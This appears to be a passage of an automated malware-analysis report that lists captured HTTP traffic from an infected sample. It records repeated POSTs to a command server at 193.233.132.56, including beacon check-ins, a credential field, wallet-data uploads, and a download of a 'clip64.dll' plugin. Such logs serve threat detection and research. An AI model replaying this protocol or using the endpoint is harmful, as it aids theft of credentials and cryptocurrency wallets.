                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0MA==Host: 193.233.132.56Content-Length: 6300Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
